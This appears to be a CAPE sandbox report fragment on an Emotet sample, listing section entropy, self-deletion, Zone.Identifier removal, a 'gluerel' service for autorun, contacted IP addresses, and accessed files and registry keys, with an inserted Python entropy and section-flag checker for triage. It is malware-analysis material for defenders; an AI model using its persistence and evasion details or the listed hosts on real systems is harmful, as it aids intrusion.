section: name: .ret, entropy: 7.89, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00011200, virtual_size: 0x00011086
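Added example, not part of the CAPE report or of CAPE's own code: a stand-alone PE section walker that reproduces the check behind the signature above (Shannon entropy per section, plus the section characteristics decoded to the same IMAGE_SCN_* names), with two extra flags a practitioner would want: a section that is both writable and executable, and a section marked both initialized and uninitialized data, which is the contradictory combination reported for .ret here and which no compiler emits. The PE fixture is constructed in-memory by `build_test_pe` so the code runs offline; `SAMPLE_SECTIONS`, the 7.0 entropy threshold and the hash-derived stand-in for packed data are assumptions of this example, not values from the sample.

```python
import hashlib
import math
import struct

# IMAGE_SECTION_HEADER.Characteristics bits that matter for triage
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniform; packed or encrypted data sits near 8."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def decode_characteristics(value):
    return "|".join(name for bit, name in sorted(SECTION_FLAGS.items()) if value & bit)


def pe_sections(blob):
    """Walk the section table of a PE image held in memory. SizeOfOptionalHeader
    is taken from the COFF header, so PE32 and PE32+ are both handled."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsections):
        (name, vsize, _va, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", blob, table + 40 * i)
        raw = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": raw_size,
            "characteristics": chars,
            "flags": decode_characteristics(chars),
            "entropy": round(shannon_entropy(raw), 2),
        })
    return sections


def suspicious_sections(sections, threshold=7.0):
    """The entropy check from the signature above plus two flag combinations no linker emits."""
    hits = []
    for s in sections:
        reasons, c = [], s["characteristics"]
        if s["entropy"] >= threshold:
            reasons.append("high_entropy")
        if c & 0x80000000 and c & 0x20000000:
            reasons.append("writable_and_executable")
        if c & 0x40 and c & 0x80:          # "initialized" and "uninitialized" at once, as .ret above
            reasons.append("initialized_and_uninitialized")
        if reasons:
            hits.append((s["name"], reasons))
    return hits


def build_test_pe(specs, file_align=0x200):
    """Constructed fixture: a minimal PE32 skeleton, valid enough for the section walk.
    specs = [(name, raw_bytes, characteristics)]; the optional header is zero-filled."""
    def align(x, a=file_align):
        return (x + a - 1) // a * a
    n, opt_size = len(specs), 0xE0
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    headers, body = b"", b""
    raw_ptr, va = align(0x40 + 4 + 20 + opt_size + 40 * n), 0x1000
    for name, data, chars in specs:
        raw_size = align(len(data))
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                               len(data), va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += align(len(data), 0x1000)
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + headers
    return head.ljust(align(len(head)), b"\0") + body


# Constructed sample: a low-entropy code section beside 4 KiB of SHA-256 output,
# which stands in for a packed or encrypted payload section.
PACKED = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))
SAMPLE_SECTIONS = [
    (".text", b"\x55\x8b\xec" * 300, 0x60000020),            # CODE|EXECUTE|READ
    (".ret", PACKED, 0xC00000C0),                            # the flag set reported for .ret above
]

if __name__ == "__main__":
    sections = pe_sections(build_test_pe(SAMPLE_SECTIONS))
    for s in sections:
        print(f"{s['name']:8s} entropy={s['entropy']:.2f} {s['flags']}")
    print(suspicious_sections(sections))
```

Two caveats when running this over real samples rather than the fixture: entropy is computed over the raw section bytes, so a section whose SizeOfRawData is padded with zeros reads slightly lower than its payload, and a high value on its own only says the bytes are uniform, which is equally true of compressed resources in benign installers. The flag combinations are the stronger tell; a section carrying both CNT_INITIALIZED_DATA and CNT_UNINITIALIZED_DATA, as .ret does, was written by a packer, not a linker.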
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
Installs itself for autorun at Windows startup
service name: gluerel
service path: "C:\Windows\SysWOW64\gluerel.exe"
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\gluerel.exe
Drops a binary and executes it
binary: C:\Windows\SysWOW64\gluerel.exe

Hosts

Direct  IP              Country
Y       90.57.69.215    France
Y       78.188.7.213    Turkey
Y       75.177.169.225  United States
Y       207.44.45.27    United States
Y       191.92.69.115   Colombia
Y       138.68.13.161   United States

DNS

No domains contacted.


Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\
C:\Users\user\AppData\Local\Temp\elVqUs.exe
C:\Windows\SysWOW64\dafpanes.exe
C:\Windows\
C:\Windows\SysWOW64\
\Device\KsecDD
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\gluerel.exe
C:\Users
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
\??\MountPointManager
C:\Users\desktop.ini
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\Windows
C:\Windows\SysWOW64
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Users\user\AppData\Local\
C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
C:\Windows\Temp
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\elVqUs.exe
\Device\KsecDD
C:\Windows\SysWOW64\shell32.dll
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Windows
C:\Users\user\AppData\Local\Temp
C:\Windows\SysWOW64\gluerel.exe
C:\Windows\SysWOW64\gluerel.exe
C:\Windows\SysWOW64\dafpanes.exe
C:\Users\user\AppData\Local\Temp\elVqUs.exe
C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\elVqUs.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\PropertyHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\elVqUs.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\elVqUs.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\Environment
HKEY_CURRENT_USER
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
